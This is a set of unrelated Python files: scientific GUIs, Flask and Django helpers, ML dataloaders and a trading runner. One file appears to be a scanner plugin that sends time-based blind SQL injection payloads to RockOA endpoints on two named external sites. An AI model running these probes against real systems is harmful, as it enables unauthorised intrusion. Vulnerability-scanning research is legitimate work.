        txt.delete('0.0', END)
        txt.insert('1.0', self.histogram.textString)
        line = txt.canvas.histogram.ln
        txt.see("%d.0" % line)
        #self.text.tag_remove(SEL, '0.0', END)
        txt.tag_remove('highlight', '0.0', END)
        txt.tag_add('highlight', "%d.0" % line, "%d.0" % (line + 1))
        txt.tag_configure('highlight', background = 'sky blue')
        #self.text.tag_add(SEL, "%d.0" % line, "%d.0" % (line + 1))
        txt['state'] = 'disabled' # back to read-only
        self.get_tk_widget().focus_set()
        return 'break'
class BRText(Text):
    ''' A tkinter Text view linked to a plot canvas; forwards navigation and
    threshold events to the canvas's histogram wrapper. '''
    def __init__(self, parent=None, notebook=None, gui=None, **args):
        Text.__init__(self, parent, takefocus=0, **args)
        self.canvas = None        # associated canvas
        self.notebook = notebook  # notebook this text view lives in
        self.gui = gui            # reference to main GUI object
    def refreshView(self):
        ''' Re-highlight the current line and redraw the linked canvas. '''
        line = self.canvas.histogram.ln
        #self.tag_remove(SEL, '0.0', END)
        self.tag_remove('highlight', '0.0', END)
        self.tag_add('highlight', "%d.0" % line, "%d.0" % (line + 1))
        self.tag_configure('highlight', background = 'sky blue')
        self.focus()
        # The update differs for deltamass vs score histograms (polymorphic).
        self.canvas.histogram.updateVerticalLine()
        self.canvas.draw()
    def select(self, event):
        ''' Mouse click: jump the selection to the clicked line. '''
        clicked = int(self.index(CURRENT).split('.')[0])  # line number only
        self.canvas.histogram.setLn(clicked)
        self.refreshView()
        return 'break'  # 'break' suppresses the widget's default behavior
    def _step(self, delta):
        ''' Shared helper for arrow-key navigation: move selection by delta. '''
        self.canvas.histogram.setLn(int(self.canvas.histogram.ln) + delta)
        self.see("%d.0" % self.canvas.histogram.ln)
        self.refreshView()
    def upKey(self, event):
        ''' Up arrow: move the selection one line up. '''
        self._step(-1)
        return 'break'
    def downKey(self, event):
        ''' Down arrow: move the selection one line down. '''
        self._step(1)
        return 'break'
    def setThresh(self, event):
        ''' Delegate threshold setting to the histogram wrapper. '''
        self.canvas.histogram.setThresh(event)
        return 'break'
    def goToRight(self, event):
        ''' Delegate right-threshold selection to the histogram wrapper. '''
        self.canvas.histogram.goToRight(event)
        return 'break'
    def goToLeft(self, event):
        ''' Delegate left-threshold selection to the histogram wrapper. '''
        self.canvas.histogram.goToLeft(event)
        return 'break'
class GUI:
    ''' Manages the main GUI window: runs the modal set-up dialog, parses the
    selected TXT files into pandas structures (via FigureGenerator), and
    builds the notebook of histogram plots with its button bar. '''
    def __init__(self, folder=None):
        '''
        Build the root window, run the modal set-up dialog, then generate the
        histogram container and the notebook. Blocks in mainloop().

        folder: starting folder for the file-open dialog (defaults to cwd).
        '''
        self.root = Tk()
        self.root.title('PAW Histogram GUI')
        if not folder:
            folder = os.getcwd()
        self.folder = folder
        # this is the starter (modal set-up) window
        self.modal = Toplevel(self.root)
        self.modal.geometry("%dx%d%+d%+d" % (300, 200, 250, 125))
        self.modal.title('PAW Set Up Dialog')
        ttk.Button(self.modal, text="Select Top Hit Summary Files", command=self.select_files).pack(pady=5)
        variable = StringVar(self.modal)
        variable.set("Plot") # default value
        # NOTE(review): ttk.OptionMenu treats its third argument as the shown
        # default, so 'variable' is reset to "Standard Plots" here and the
        # later `variable.get() == 'Plot'` test can never be true -- confirm
        # the intended default plot type.
        ttk.OptionMenu(self.modal, variable, "Standard Plots", "Smoothed Plots").pack(pady=5)
        self.massAccuracy = StringVar(self.modal)
        self.massAccuracy.set("High") # default value (gets over-written during file loading)
        ttk.OptionMenu(self.modal, self.massAccuracy, "High Resolution", "Low Resolution").pack(pady=5)
        ttk.Button(self.modal, text="Load and Plot Histograms", command=self.exit_modal).pack(pady=5)
        self.root.protocol('WM_DELETE_WINDOW', self.onExit) # handle exit
        self.modal.protocol('WM_DELETE_WINDOW', self.exit_modal) # cannot get setup window to delete on mac
        self.root.withdraw()
        self.modal.attributes('-topmost', 1)
        # self.modal.attributes('-topmost', 0)
        self.root.wait_window(self.modal) # waits for the user to set the files, resolution, etc.
        self.root.deiconify()
        # when we get here, we are starting the histogramming
        # Setup flags
        self.sparseDiscScore = 100.0 # score reported when data are too sparse to threshold
        self.ACCURATE_MASS = True
        self.SMOOTHED = True
        if self.massAccuracy.get() == 'Low Resolution':
            self.ACCURATE_MASS = False
        if variable.get() == 'Plot':
            self.SMOOTHED = False
        # Make histograms
        self.container = FigureGenerator(files=self.txt_files, accurateMass=self.ACCURATE_MASS, smoothed=self.SMOOTHED)
        print('Generating GUI...')
        # Main frames: button bar on top, notebook of plots below.
        self.buttonFrame = Frame(self.root)
        self.buttonFrame.pack(side=TOP, fill=X)
        self.computeScoreHistograms = ttk.Button(self.buttonFrame, text = 'Compute Score Histograms', takefocus=0, command=self.compute_score_histograms)
        self.computeScoreHistograms.pack(side=LEFT, padx=5, pady=2)
        ttk.Button(self.buttonFrame, text = 'Show mass windows', takefocus=0, command=self.get_masses).pack(side=LEFT, padx=5, pady=2)
        self.notebook = BRNotebook(gui=self, container=self.container, plotType = variable, takefocus=0)
        self.notebook.pack(side=BOTTOM)
        #f = Frame(self.root)
        #Label(f, text = 'Sidebar: Additional widgets here...').pack()
        #f.pack(side=BOTTOM)
        mainloop()
    def onExit(self):
        """Properly closes down the GUI program."""
        import sys
        self.root.withdraw()
        self.root.update_idletasks()
        self.root.destroy()
        sys.exit()
    def pickleDeltaMass(self):
        '''Pickle the histogram container (delta-mass stage) to output.pkl.'''
        with open("output.pkl", "wb") as fout:
            pickle.dump(self.container, fout)
    def pickleScore(self):
        '''Pickle the histogram container (score stage) to output_scores.pkl.'''
        with open("output_scores.pkl", "wb") as fout:
            pickle.dump(self.container, fout)
    def exit_modal(self):
        '''Close the modal set-up dialog and resume __init__.'''
        self.modal.withdraw()
        self.modal.update_idletasks()
        self.modal.destroy()
    def select_files(self):
        '''Ask the user for the top-hit TXT files; chdir to their folder.'''
        self.txt_files = PAW_lib.get_files(self.folder, [('Text files', '*.txt'), ('PAW Text files', '*.PAW.txt')],
                                           'Select the Top-hit TXT files') # returns full paths
        if not self.txt_files: sys.exit() # cancel button response
        self.folder = os.path.dirname(self.txt_files[0])
        os.chdir(self.folder)
    def get_scores(self):
        '''Show a dialog listing the score threshold for every histogram.'''
        s = ''
        # container is indexed [dm][z][ntt][mod]; walk all four levels.
        # (The original reused the name 'score' at every level.)
        for by_z in self.container.container:
            for by_ntt in by_z:
                for by_mod in by_ntt:
                    for score in by_mod:
                        s += (str(score.dm) + " , "
                              + str(score.z) + " +, "
                              + str(score.ntt) + " tt, "
                              + str(score.mod) + " mod: ")
                        if(score.sparseData):
                            s += str(100) + '\n'
                        else:
                            s += ('%0.4f' % score.histo.DiscScore[score.threshold]) + '\n'
        messagebox.showinfo(title = "Scores", message = s)
        #self.get_stats()
    def get_masses(self):
        '''Show a dialog listing the delta-mass windows per charge state.'''
        s = ''
        for dm in range(len(self.container.dmList)):
            for z in range(len(self.container.zList)):
                if dm == 2:
                    # "Outside" window: symmetric +/- dmRange limits.
                    s += '\n' + ('%d' % self.container.dmContainer[dm][z].z) + "+ , " + " Outside"
                    s += "\n\tLow: " + ('%0.4f' % -self.container.dmContainer[dm][z].dmRange) + " \n\tHigh: " + ('%0.4f' % self.container.dmContainer[dm][z].dmRange)
                elif dm == 0 or dm == 1:
                    s += '\n' + ('%d' % self.container.dmContainer[dm][z].z) + "+ , " + ('%d' % self.container.dmContainer[dm][z].dm) + " Da"
                    s += "\n\tLow: " + ('%0.4f' % self.container.dmContainer[dm][z].thresholdLow) + " \n\tHigh: " + ('%0.4f' % self.container.dmContainer[dm][z].thresholdHigh)
        messagebox.showinfo(title = "Mass Thresholds", message = s)
    def compute_score_histograms(self):
        '''Switch the notebook to the score view and add the score buttons.'''
        self.container.regenerateScorePlots()
        self.notebook.setup()
        ttk.Button(self.buttonFrame, text = 'Show score thresholds', takefocus=0, command=self.get_scores).pack(side=LEFT, padx=5, pady=2)
        ttk.Button(self.buttonFrame, text = 'Filter Data', takefocus=0, command=self.exportToFilterer).pack(side=LEFT, padx=5, pady=2)
        self.computeScoreHistograms['state'] = 'disabled'  # one-shot button
        # Save figures
        self.notebook.saveDMFigures()
    def get_stats(self):
        '''Delegate statistics generation to the container.'''
        self.container.get_stats_helper()
    def exportToFilterer(self):
        '''Collect mass windows and score thresholds, then run the filter.'''
        import time
        filterer = DataInfoAndFilter(self.folder, self.container.f.getFrame(), self.container.txtObjects,
                                     self.container.dmList, self.container.zList, self.container.nttList, self.container.specialCharsList,
                                     self.container.minLength, self.container.maxMods, self.container.peptideMassTol)
        filterer.get_pre_stats()
        # Mass windows, indexed [z][dm].
        masses = [[Threshold() for dm in self.container.dmList] for z in self.container.zList]
        for dm in range(len(self.container.dmList)):
            for z in range(len(self.container.zList)):
                if(dm == 2):
                    # "Outside" window uses the symmetric +/- dmRange limits.
                    masses[z][dm].low = -1 * self.container.dmContainer[dm][z].dmRange
                    masses[z][dm].high = self.container.dmContainer[dm][z].dmRange
                else:
                    masses[z][dm].low = self.container.dmContainer[dm][z].thresholdLow
                    masses[z][dm].high = self.container.dmContainer[dm][z].thresholdHigh
        # Score thresholds, indexed [dm][z][ntt][mod]; sparse cells keep the default.
        scores = [[[[100.0 for mod in self.container.specialCharsList] for ntt in self.container.nttList] for z in self.container.zList] for dm in self.container.dmList]
        for dm in range(len(self.container.dmList)):
            for z in range(len(self.container.zList)):
                for ntt in range(len(self.container.nttList)):
                    for mod in range(len(self.container.specialCharsList)):
                        ref = self.container.container[dm][z][ntt][mod]
                        if ref.sparseData:
                            scores[dm][z][ntt][mod] = self.sparseDiscScore
                        else:
                            scores[dm][z][ntt][mod] = ref.histo.DiscScore[ref.threshold]
        filter_frame = filterer.filter_with_stats(masses, scores) # probably do not need to have a returned dataframe
        filterer.copy_params_files()
        for obj in filterer.write:
            print('\n...finished.', time.asctime(), file=obj)
        filterer.log_file.close()
        # Save figures
        self.notebook.saveScoreFigures()
    def _quit(self):
        '''Stop the mainloop and destroy the root window.'''
        # Fixed: the original referenced an undefined global `root`.
        self.root.quit()     # stops mainloop
        self.root.destroy()  # this is necessary on Windows to prevent
                             # Fatal Python Error: PyEval_RestoreThread: NULL tstate
#########################
# default folder location
folder = os.getcwd() # this is a safe default
# NOTE(review): the line below unconditionally overrides the safe cwd default
# with a machine-specific drive letter; comment it out (or guard it with an
# os.path.exists check) on systems where "E:" does not exist.
folder = "E:" # or set to something useful for your system
#########################
gui = GUI(folder)
| 50,116 | 15,639 |
#!/usr/bin/env python
"""Test add_metadata_route function with legal parameters.
"""
import apikit
from flask import Flask
def test_set_flask_metadata():
    """Exercise metadata creation and route registration with legal parameters."""
    app = Flask("bob")
    apikit.set_flask_metadata(app, "2.0", "http://example.repo", "BobApp")
    # The route argument may be an empty string, a plain string, or a list.
    for route in ("", "bob", ["bob"], ["bob", "chuck"]):
        apikit.add_metadata_route(app, route)
| 493 | 177 |
#!/usr/bin/python
#-*- coding: utf-8 -*-
#Refer: 0day 这么多注入总有一个适合你
import time
def assign(service, arg):
    """Return ``(True, arg)`` when *service* is the rockoa target, else None."""
    if service != "rockoa":
        return None
    return True, arg
def test_inj_get(url):
    """Time-based blind SQL-injection probe over GET; True when *url* looks vulnerable."""
    payload = "' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm"
    verify = url + payload
    t0 = time.time()
    code, head, res, errcode, _ = curl.curl2(url)
    t1 = time.time()
    code, head, res, errcode, _ = curl.curl2(verify)
    t2 = time.time()
    code, head, res, errcode, _ = curl.curl2(url)
    t3 = time.time()
    # Two baseline requests bracket the injected one; a >= 7s skew flags SLEEP(7).
    return abs((t2 - t1) - (t1 - t0)) - abs((t1 - t0) - (t3 - t2)) >= 7
def test_inj_post(url, data):
    """Time-based blind SQL-injection probe over POST; True when *url* looks vulnerable."""
    payload = "' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm"
    verify_data = data + payload
    t0 = time.time()
    code, head, res, errcode, _ = curl.curl2(url=url, post=data)
    t1 = time.time()
    code, head, res, errcode, _ = curl.curl2(url=url, post=verify_data)
    t2 = time.time()
    code, head, res, errcode, _ = curl.curl2(url=url, post=data)
    t3 = time.time()
    # Same bracketing as the GET probe, with a slightly looser 6s threshold.
    return abs((t2 - t1) - (t1 - t0)) - abs((t1 - t0) - (t3 - t2)) >= 6
def audit(arg):
    """Probe known rockoa endpoints for SQL injection; report the first hit."""
    payloads = [
        'rock.php?a=default&d=webim&m=index&ajaxbool=false&uid=1',
        'rock.php?a=getuserone&d=webim&m=index&ajaxbool=true&sholauid=1',
        'rock.php?a=createlun&d=webim&m=index&ajaxbool=true&aid=1',
        'rock.php?a=check&d=webim&m=login&ajaxbool=true&adminuser=1',
        'rock.php?a=getlist&d=taskrun&m=work&ajaxbool=true|dt=12',
        'rock.php?a=yaoqinguid&d=webim&m=group&ajaxbool=true|val=1',
        'rock.php?a=save&d=webim&m=group&ajaxbool=true|receid=1',
        'rock.php?a=check&d=taskrun&m=flow&ajaxbool=true|flownum=1',
        'rock.php?a=adduser&d=webim&m=guan&ajaxbool=true|val=1&gid=1',
        'rock.php?a=save&d=webim&m=user&ajaxbool=true|receid=122',
        'rock.php?a=fenxi&d=taskrun&m=kaoqin&ajaxbool=true',
        'rock.php?a=default&d=webim&m=index&ajaxbool=false&uid=1',
        'rock.php?a=getuserone&d=webim&m=index&ajaxbool=true&sholauid=1',
        'rock.php?a=data&d=webim&m=record&ajaxbool=true&atype=user',
        'rock.php?a=view&d=taskrun&m=flow&ajaxbool=false&uid=1&mid=1&modenum=1',
    ]
    for payload in payloads:
        url = arg + payload
        parts = payload.split('|')
        if len(parts) == 2:
            # "path|postdata" entries are probed via POST.
            if test_inj_post(url.split('|')[0], parts[1]):
                security_hole(url.split('|')[0] + '(post data ' + parts[1] + ') sql injection!')
                return
        if len(parts) == 1:
            if test_inj_get(url):
                security_hole(url + ' sql injection!')
                return
if __name__ == '__main__':
    # `dummy` supplies the curl / security_hole helpers the probes above use.
    from dummy import *
    audit(assign('rockoa', 'http://www.jingkelai.com/jingkelaioa/')[1])
    audit(assign('rockoa', 'http://www.ihkda.com/hg/')[1])
from flask import render_template
from flask_mail import Message
from smtplib import SMTPDataError
from threading import Thread
from app import mail
import logging
logger = logging.getLogger(__name__)
def _async(app, msg):
    """Deliver *msg* inside the Flask app context; log SMTP data errors instead of raising."""
    with app.app_context():
        try:
            mail.send(msg)
        except SMTPDataError as exc:
            logger.warning(str(exc))
def send_email_async(app, recipient, subject, template, bcc=None, **kwargs):
    """Render *template* (.txt and .html) and send it on a background thread.

    *recipient* may be a single address or a list; extra kwargs feed the templates.
    """
    recipients = recipient if isinstance(recipient, list) else [recipient]
    subject_line = app.config['EMAIL_SUBJECT_PREFIX'] + ' ' + subject
    msg = Message(
        subject_line,
        sender=app.config['EMAIL_SENDER'],
        recipients=recipients, bcc=bcc)
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    Thread(target=_async, args=(app, msg)).start()
| 851 | 267 |
# AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/02_dataloaders.ipynb (unless otherwise specified).
__all__ = ['ObjectDetectionDataLoaders']
# Cell
from fastai.vision.all import *
from .core import *
# Cell
def _bin_mask_stack_and_padding(t, pad_idx=0):
    "Function for padding to create batches when number of objects is different"
    imgs, stacked_masks, bboxes, labels = [], [], [], []
    for item in t:
        imgs.append(item[0])
        stacked_masks.append(torch.stack(item[1], dim=0))
        bboxes.append(item[2])
        labels.append(item[3])
    samples = L(s for s in zip(imgs, stacked_masks, bboxes, labels))
    # Drop degenerate boxes (and their masks/labels) before padding.
    samples = [(s[0], *_clip_remove_empty_with_mask(*s[1:])) for s in samples]
    max_len = max(len(s[3]) for s in samples)

    def _pad(img, bin_mask, bbox, lbl):
        "Zero-pad masks/boxes and pad labels with `pad_idx` up to `max_len` objects."
        n_missing = max_len - bin_mask.shape[0]
        bin_mask = torch.cat([bin_mask, bin_mask.new_zeros(n_missing, bin_mask.shape[-2], bin_mask.shape[-1])])
        bbox = torch.cat([bbox, bbox.new_zeros(max_len - bbox.shape[0], 4)])
        lbl = torch.cat([lbl, lbl.new_zeros(max_len - lbl.shape[0]) + pad_idx])
        return img, TensorBinMasks(bin_mask), bbox, lbl

    return [_pad(*s) for s in samples]
def _clip_remove_empty_with_mask(bin_mask, bbox, label):
bbox = torch.clamp(bbox, -1, 1)
empty = ((bbox[...,2] - bbox[...,0])*(bbox[...,3] - bbox[...,1]) <= 0.)
return (bin_mask[~empty], bbox[~empty], label[~empty])
# Cell
class ObjectDetectionDataLoaders(DataLoaders):
    """Basic wrapper around `DataLoader`s with factory method
    for object detection and instance segmentation problems"""

    # Class-level configuration written by `from_df`; the plain-function
    # getters below read it because fastai's DataBlock calls them without
    # an instance.
    df = pd.DataFrame()
    img_id_col, img_path_col, class_col = "","",""
    bbox_cols = []
    mask_path_col,object_id_col = "",""

    @classmethod
    @delegates(DataLoaders.from_dblock)
    def from_df(cls, df, valid_pct=0.2, img_id_col="image_id", img_path_col="image_path",
                bbox_cols=["x_min", "y_min", "x_max", "y_max"], class_col="class_name",
                mask_path_col="mask_path", object_id_col="object_id",
                seed=None, vocab=None, add_na=True, item_tfms=None, batch_tfms=None, debug=False, **kwargs):
        """Create dataloaders from `DataFrame`

        Builds an instance-segmentation DataBlock (with binary masks) when
        `mask_path_col` exists in `df`, a plain detection one otherwise.
        NOTE(review): `seed` is accepted but not used in this body — confirm intent.
        """
        if vocab is None :
            vocab = [c for c in df[class_col].unique()]
        # Stash the configuration on the class for the getter functions below.
        cls.df = df
        cls.img_id_col,cls.img_path_col,cls.class_col = img_id_col,img_path_col,class_col
        cls.bbox_cols = bbox_cols
        cls.mask_path_col,cls.object_id_col = mask_path_col,object_id_col
        with_mask = mask_path_col in df.columns
        #if item_tfms is None: item_tfms = [Resize(800, method="pad", pad_mode="zeros")]
        if not with_mask:
            # Detection only: image -> (bboxes, labels); pad batches with bb_pad.
            dblock = DataBlock(
                blocks=(ImageBlock(cls=PILImage), BBoxBlock, BBoxLblBlock(vocab=vocab, add_na=add_na)),
                n_inp=1,
                splitter=RandomSplitter(valid_pct),
                get_items=cls._get_images,
                get_y=[cls._get_bboxes, cls._get_labels],
                item_tfms=item_tfms,
                batch_tfms=batch_tfms)
            if debug: print(dblock.summary(df))
            res = cls.from_dblock(dblock, df, path=".", before_batch=[bb_pad], **kwargs)
        else:
            if batch_tfms is None: batch_tfms = []
            # Segmentation: image -> (masks, bboxes, labels); custom pad/stack.
            dblock = DataBlock(
                blocks=(ImageBlock(cls=PILImage), BinaryMasksBlock,
                        BBoxBlock, BBoxLblBlock(vocab=vocab, add_na=add_na)),
                n_inp=1,
                splitter=RandomSplitter(valid_pct),
                get_items=cls._get_images,
                get_y=[cls._get_masks, cls._get_bboxes, cls._get_labels],
                item_tfms=item_tfms,
                batch_tfms=[TensorBinMasks2TensorMask(), *batch_tfms])
            if debug: print(dblock.summary(df))
            res = cls.from_dblock(dblock, df, path=".", before_batch=[_bin_mask_stack_and_padding],**kwargs)
        return res

    # The functions below are deliberately not methods (no self/cls): the
    # DataBlock invokes them as bare callables.
    def _get_images(df):
        "Unique image paths to feed the DataBlock."
        img_path_col = ObjectDetectionDataLoaders.img_path_col
        fns = L(fn for fn in df[img_path_col].unique())
        return fns

    def _get_bboxes(fn):
        "Bounding boxes of image `fn` as [x_min, y_min, x_max, y_max] lists."
        df = ObjectDetectionDataLoaders.df
        img_path_col = ObjectDetectionDataLoaders.img_path_col
        x_min_col, y_min_col, x_max_col, y_max_col = ObjectDetectionDataLoaders.bbox_cols
        filt = df[img_path_col] == fn #Path(fn)
        bboxes = [list(i) for i in zip(df.loc[filt,x_min_col], df.loc[filt,y_min_col],
                                       df.loc[filt,x_max_col], df.loc[filt,y_max_col])]
        return bboxes

    def _get_labels(fn):
        "Class labels of image `fn`, aligned with `_get_bboxes`."
        df = ObjectDetectionDataLoaders.df
        img_path_col = ObjectDetectionDataLoaders.img_path_col
        class_col = ObjectDetectionDataLoaders.class_col
        filt = df[img_path_col] == fn #Path(fn)
        labels = [l for l in df.loc[filt, class_col]]
        return labels

    def _get_masks(fn):
        "Per-object mask file paths of image `fn`."
        df = ObjectDetectionDataLoaders.df
        img_path_col = ObjectDetectionDataLoaders.img_path_col
        mask_path_col = ObjectDetectionDataLoaders.mask_path_col
        filt = df[img_path_col] == fn
        mask_paths = [m for m in df.loc[filt, mask_path_col]]
        return mask_paths
'''
Description:
Get information from Youtube in a simple way.
Author: AlejandroV
Version: 0.1.0
'''
import AVMYT as yt

# Fetch channel metadata by (partial) channel name.
channel = yt.getChannelInfo("luisito")  # get channel
# NOTE(review): keys "name"/"subs"/"videos" are presumably display strings — confirm against AVMYT docs.
print(channel["name"] + " tiene " + channel["subs"] + " y un total de " + channel["videos"])  # prints info of Luisito Comunica
import multiprocessing
import os
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
def findConnectKey():
    """Return the gateway name of the first ``*_connect.json`` file in the
    current working directory, or ``None`` when no such file exists.

    The previous version used ``file.find(...) >= 0`` and fell off the end
    without an explicit return; this keeps the same behavior idiomatically.
    """
    for file in os.listdir("."):
        if "_connect.json" in file:
            return file.replace("_connect.json", "")
    return None
#----------------------------------------------------------------------
def runChildProcess():
    """Child-process entry point: build the vn.py CTA engine, connect the
    OKEX gateway, start all strategies and block forever."""
    print('-'*30)
    # Create the log engine
    le = LogEngine()
    le.setLogLevel(le.LEVEL_INFO)
    # le.addConsoleHandler()
    # le.addFileHandler()
    le.info(u'启动CTA策略运行子进程')
    ee = EventEngine2()
    le.info(u'事件引擎创建成功')
    me = MainEngine(ee)
    me.addGateway(okexGateway)
    me.addApp(ctaStrategy)
    le.info(u'主引擎创建成功')
    # Route log events (engine + CTA) to the log engine.
    ee.register(EVENT_LOG, le.processLogEvent)
    ee.register(EVENT_CTA_LOG, le.processLogEvent)
    le.info(u'注册日志事件监听')
    # Derive the gateway name from the *_connect.json file found on disk.
    KEY = findConnectKey()
    me.connect(KEY)
    le.info(u'连接行情和交易接口')
    sleep(5)  # wait for the gateway/API to initialise
    me.dataEngine.saveContracts()  # persist contract info to file
    cta = me.getApp(ctaStrategy.appName)
    cta.loadSetting()
    cta.initAll()
    cta.startAll()
    # Keep the process alive; strategies run on the event engine's threads.
    while True:
        sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
    """Guardian parent process: start the child during trading sessions and
    terminate it outside of them, checking every 5 seconds."""
    # Create the log engine
    le = LogEngine()
    le.setLogLevel(le.LEVEL_INFO)
    le.addConsoleHandler()
    le.addFileHandler()
    le.info(u'启动CTA策略守护父进程')
    DAY_START = time(8, 45)  # day-session start/stop times
    DAY_END = time(15, 30)
    NIGHT_START = time(20, 45)  # night-session start/stop times
    NIGHT_END = time(2, 45)
    p = None  # child-process handle
    while True:
        currentTime = datetime.now().time()
        recording = False
        # Determine which trading session (if any) we are currently in.
        # The night session wraps midnight, hence the two open-ended checks.
        if ((currentTime >= DAY_START and currentTime <= DAY_END) or
            (currentTime >= NIGHT_START) or
            (currentTime <= NIGHT_END)):
            recording = True
        # During trading hours, make sure the child process is running.
        if recording and p is None:
            le.info(u'启动子进程')
            p = multiprocessing.Process(target=runChildProcess)
            p.start()
            le.info(u'子进程启动成功')
        # Outside trading hours, stop the child process.
        if not recording and p is not None:
            le.info(u'关闭子进程')
            p.terminate()
            p.join()
            p = None
            le.info(u'子进程关闭成功')
        sleep(5)
if __name__ == '__main__':
    runChildProcess()  # run 7*24, fully unattended
    # Although this is also unattended, it is strongly recommended to check
    # manually at every start — be responsible for your own PnL.
    #runParentProcess()
import logging
import sys
# Map user-facing level names (lower-case) to stdlib logging constants.
LOG_LEVEL_MAP = {
    'debug': logging.DEBUG,
    'info': logging.INFO,
    'warning': logging.WARNING,
    'error': logging.ERROR,
    'critical': logging.CRITICAL,
}
class ExporterError(Exception):
    """Base exception for exporter failures."""
class ExporterLogger(logging.Logger):
    """`logging.Logger` preconfigured to emit formatted records to stdout."""

    def __init__(self, name, path=None, level='error', fmt='%(asctime)s [%(levelname)-5.5s]: %(message)s'):
        self._path = path  # NOTE(review): stored but unused here — presumably for file output; confirm
        # Resolve the textual level via the class: once Logger.__init__ runs,
        # the instance attribute ``level`` (an int) shadows the ``level``
        # classmethod, so self.level(...) would stop working afterwards.
        self._level = type(self).level(level)
        super(ExporterLogger, self).__init__(name, self._level)
        self._formatter = logging.Formatter(fmt)
        handler = logging.StreamHandler(sys.stdout)
        handler.setFormatter(self._formatter)
        self.addHandler(handler)

    @classmethod
    def level(cls, level):
        """Map a level name (case-insensitive) to its ``logging`` constant."""
        return LOG_LEVEL_MAP[level.lower()]

    @property
    def formatter(self):
        """The shared `logging.Formatter` installed on this logger's handlers."""
        return self._formatter
| 881 | 285 |
# IMPORT
import os,sys

# MAIN
# Usage banner: this script expands each SRA accession in the input list into
# a full ProcessSRA_hpcc2.py command line and writes them to <files>.runcc.
print('''
inp1 = file with list of SRA files
inp2 = bowtie index base (full path)
inp3 = SE (0) or PE (1) or paired processed as single (2)
inp3 and on:
Any additional parameters for ProcessSRA_hpcc2.py
These will be appended exactly as they appear
''')

files = sys.argv[1]
bowtie_index = sys.argv[2]
SE = sys.argv[3]

out_cmd = "module load SRAToolkit; module load FastQC; module load Trimmomatic; \
module load TopHat2; module load Boost; module load SAMtools; module load python; \
python /mnt/home/john3784/Github/RNAseq_pipeline/\
ProcessSRA_hpcc2.py %s %s %s"

# Extra CLI arguments are appended verbatim to every generated command.
if len(sys.argv) > 4:
    additional_commands = " ".join(sys.argv[4:])
    out_cmd = out_cmd+" "+additional_commands

# Context managers close both files even on error (previously the input
# handle was never closed and the output was closed manually).
with open(files, "r") as in_fh:
    file_list = [f.strip() for f in in_fh.readlines()]

with open(files+".runcc", "w") as output:
    for file in file_list:
        output.write(out_cmd %(file, bowtie_index, SE)+"\n")
| 1,181 | 458 |
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from rest_framework.serializers import StringRelatedField
from drf_haystack.serializers import HaystackSerializer
from . models import Media, MediaPublish, Category, Creator, Provider, MediaUser
from . search_indexes import MediaIndex
class MediaSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Media; related names render as plain strings."""

    # Render the many-to-many relations by their __str__ instead of links.
    genre = serializers.StringRelatedField(many=True, read_only=True)
    publisher = serializers.StringRelatedField(many=True, read_only=True)
    artist = serializers.StringRelatedField(many=True, read_only=True)

    class Meta:
        model = Media
        fields = [
            'url',
            'id',
            'title',
            'artist',
            'publisher',
            'originating_country',
            'genre',
            'publishing_date',
            'date_published']
class CategorySerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing basic Category fields."""

    class Meta:
        model = Category
        fields = ['id', 'name', 'description']
class CreatorSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing basic Creator fields."""

    class Meta:
        model = Creator
        fields = ['id', 'name', 'date_of_birth']
class ProviderSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing basic Provider fields."""

    class Meta:
        model = Provider
        fields = ['id', 'name', 'provider_rank']
class MediaUserSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing basic MediaUser fields."""

    class Meta:
        model = MediaUser
        fields = ['id', 'name']
class MediaPublishSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for MediaPublish; user and media render as strings."""

    user = serializers.StringRelatedField(read_only=True)
    media = serializers.StringRelatedField(read_only=True)

    class Meta:
        model = MediaPublish
        fields = ['id', 'user', 'media', 'date_expiry']
class MediaSearchSerializer(HaystackSerializer):
    """Haystack search serializer backed by the MediaIndex."""

    class Meta:
        index_classes = [MediaIndex]
        fields = ['text', 'country_published', 'date']
class UserSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for Django auth User, exposing identity fields only."""

    class Meta:
        model = User
        fields = ('username', 'email', "first_name", "last_name")
class GroupSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for Django auth Group, exposing the name only."""

    class Meta:
        model = Group
        fields = ("name", )
| 2,097 | 668 |
from typing import List, Optional, Type
from beam.registry import default_registry, register
from django.apps import apps
from django.contrib import messages
from django.contrib.admin.utils import NestedObjects
from django.core.exceptions import FieldDoesNotExist, PermissionDenied
from django.db import router
from django.forms import all_valid
from django.http import HttpResponse, HttpResponseForbidden
from django.shortcuts import redirect
from django.utils.html import escape
from django.utils.translation import gettext as _
from django.views import generic
from django.views.generic.base import ContextMixin, TemplateView
from django_filters.filterset import filterset_factory
from extra_views import SearchableListMixin
from .actions import Action
from .components import Component, ListComponent
from .inlines import RelatedInline
class ComponentMixin(ContextMixin):
    """View mixin binding a beam ``Component`` and its viewset to the view.

    Routes the standard Django CBV hooks (model, queryset, form class, fields)
    through the component's configuration and enforces its permission check.
    """

    component: Optional[Component] = None  # set by the viewset when the view is built
    viewset = None

    def get_context_data(self, **kwargs):
        """Expose viewset, component and the popup flag to templates."""
        context = super().get_context_data(**kwargs)
        context["viewset"] = self.viewset
        context["component"] = self.component
        context["popup"] = self.request.GET.get("_popup")
        return context

    @property
    def model(self):
        return self.component.model

    def get_queryset(self):
        return self.component.queryset

    def get_form_class(self):
        # A component-level form class wins over the default model form.
        if self.component.form_class:
            return self.component.form_class
        return super().get_form_class()

    @property
    def fields(self):
        if self.component.fields:
            return self.component.fields
        return super().fields

    def get_inline_classes(self):
